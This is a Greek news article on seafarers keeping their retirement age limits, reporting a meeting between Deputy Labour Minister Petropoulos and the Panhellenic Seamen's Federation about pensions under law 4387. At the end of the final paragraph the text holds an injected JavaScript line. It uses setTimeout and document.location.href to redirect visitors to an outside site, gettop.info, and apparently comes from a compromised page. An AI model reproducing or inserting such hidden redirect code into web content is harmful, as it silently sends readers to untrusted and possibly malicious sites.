Διατηρούνται τα όρια ηλικίας για τη συνταξιοδότηση των ναυτικών

0
6

 

Tην πρώτη από τις προγραμματισμένες συναντήσεις με τους συνδικαλιστικούς εκπροσώπους των ναυτικών είχε ο υφυπουργός Εργασίας και Κοινωνικής Αλληλεγγύης Τάσος Πετρόπουλος στο υπουργείο Ναυτιλίας όπου παρών ήταν και ο υπουργός Παναγιώτης Κουρουμπλής.

Ο κ. Πετρόπουλος διαβεβαίωσε τη διοίκηση της Πανελλήνιας Ναυτικής Ομοσπονδίας ότι διατηρούνται τα όρια ηλικίας για τη συνταξιοδότηση των ναυτικών και αναγνωρίζοντας την τεράστια προσφορά των Ναυτικών στην οικονομία της Ελλάδας είπε: «Βάζουμε άλλα θεμέλια στην Κοινωνική Ασφάλιση, και, στην εφαρμογή του νόμου 4387, λαμβάνονται υπόψη τα ιδιαίτερα χαρακτηριστικά του ναυτικού επαγγέλματος».

Πρόσθεσε ότι διατηρούνται τα όρια ηλικίας για τη συνταξιοδότηση των ναυτικών, ενώ τα όσα κυκλοφορούν για το ύψος των συντάξεων είναι ακόμη στον αέρα καθώς δεν έχει εκδοθεί η σχετική εγκύκλιος που θα ρυθμίζει τις λεπτομέρειες.

Πρόσθεσε επίσης ότι προσωρινές συντάξεις έχουν ξεκινήσει να καταβάλλονται και ήδη έχουν πιστωθεί στους λογαριασμούς του μεγαλύτερου ποσοστού των αιτηθέντων. Τόνισε ότι ο καθορισμός των εφάπαξ έγινε με εγκύκλιο που εκδόθηκε στις 22 Δεκεμβρίου, στη βάση των προτάσεων των συνδικάτων και της Εθνικής Αναλογιστικής Αρχής.

Σχετικά με τις συντάξεις χηρείας ανέφερε ότι ακολουθήθηκε το πρότυπο που ισχύει στις άλλες ευρωπαϊκές χώρες, για προφανείς λόγους.

Ο κ. Πετρόπουλος απευθυνόμενος στα μέλη της ΠΝΟ είπε ότι παραλαμβάνοντας «ένα πλοίο που μπάζει νερά, πρώτο μέλημα είναι να σταματήσουμε τις διαρροές» και το κάνουμε αναλογιζόμενοι πάντα τις ιδιαιτερότητες αλλά και την συνεισφορά των ναυτικών στην Ελλάδα.

Ο υπουργός Ναυτιλίας Π.Κουρουμπλής προανήγγειλε ειδική συνάντηση με την ΠΝΟ και με την Ένωση Ελλήνων Εφοπλιστών, στο πλαίσιο των πρωτοβουλιών που έχει υποσχεθεί ότι θα αναλάβει για τα χρονίζοντα θέματα των Ναυτικών. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here